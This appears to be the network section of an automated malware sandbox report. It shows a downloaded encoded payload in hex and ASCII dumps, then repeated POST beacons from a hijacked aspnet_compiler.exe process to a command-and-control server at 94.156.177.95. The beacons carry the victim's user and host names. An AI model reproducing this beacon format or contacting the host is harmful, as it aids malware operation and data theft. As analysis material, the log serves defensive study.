                                                                                                                    Nov 15, 2024 18:14:29.780566931 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    Nov 15, 2024 18:14:29.780618906 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    Nov 15, 2024 18:14:29.780690908 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    Nov 15, 2024 18:14:29.780741930 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    Nov 15, 2024 18:14:29.780796051 CET1236INData Raw: 43 4a 6b 51 2b 76 39 32 6f 63 36 33 73 34 2f 32 62 54 30 45 2b 41 77 46 47 47 6b 51 43 4a 70 51 43 70 2b 31 42 67 50 41 53 4b 41 4b 42 41 64 2b 43 4a 6b 30 58 48 41 2b 41 49 6b 51 43 4a 6b 47 35 42 4d 51 43 4a 6b 51 43 67 53 41 51 6e 76 64 2f 39
                                                                                                                    Data Ascii: CJkQ+v92oc63s4/2bT0E+AwFGGkQCJpQCp+1BgPASKAKBAd+CJk0XHA+AIkQCJkG5BMQCJkQCgSAQnvd/9//vLkQCJkQCJkQCJkfRCJ09PkQCJkQCJYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    Nov 15, 2024 18:14:29.785969019 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsxGZuIzMUVVQFx0TAwGbk5iMzUGbvBAAlNmbhR3culUZ0FWZyN0bDBAEAAQZ6lGbhlGdp5WauV1bDBAbAAQZ6lGbhlGdp5WSvNEA+AAAsxGZuIzMMVkTSV0SAAAc


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.54976194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:31.421145916 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 180
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:31.426230907 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: 'ckav.rualfons927537ALFONS-PCk0FDD42EE188E931437F4FBE2CFomP1
                                                                                                                    Nov 15, 2024 18:14:32.403141975 CET228INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:32 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 15
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.54976694.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:32.574347973 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 180
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:32.580657959 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: 'ckav.rualfons927537ALFONS-PC+0FDD42EE188E931437F4FBE2CQClad
                                                                                                                    Nov 15, 2024 18:14:33.527932882 CET228INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:33 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 15
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.54977194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:33.643413067 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:33.648797035 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:34.615878105 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:34 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.54977694.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:34.775031090 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:34.779934883 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:35.751368046 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:35 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.54978594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:35.922072887 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:35.927180052 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:36.861615896 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:36 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.54979094.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:37.036499023 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:37.042043924 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:37.994832993 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:37 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.54979594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:38.150047064 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:38.155116081 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:39.112399101 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:38 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.54980194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:39.305438995 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:39.310498953 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:40.262424946 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:40 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.54980794.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:40.413522005 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:40.418720961 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:41.384887934 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:41 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.54981194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:41.534507036 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:41.540422916 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:42.506726980 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:42 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.54981594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:42.661401033 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:42.666273117 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:43.611865044 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:43 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.54982094.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:43.775824070 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:43.780827045 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:44.788902044 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:44 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.54982794.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:44.943254948 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:14:44.948157072 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:14:47.376245022 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:14:47 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.54983994.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:14:47.560796976 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
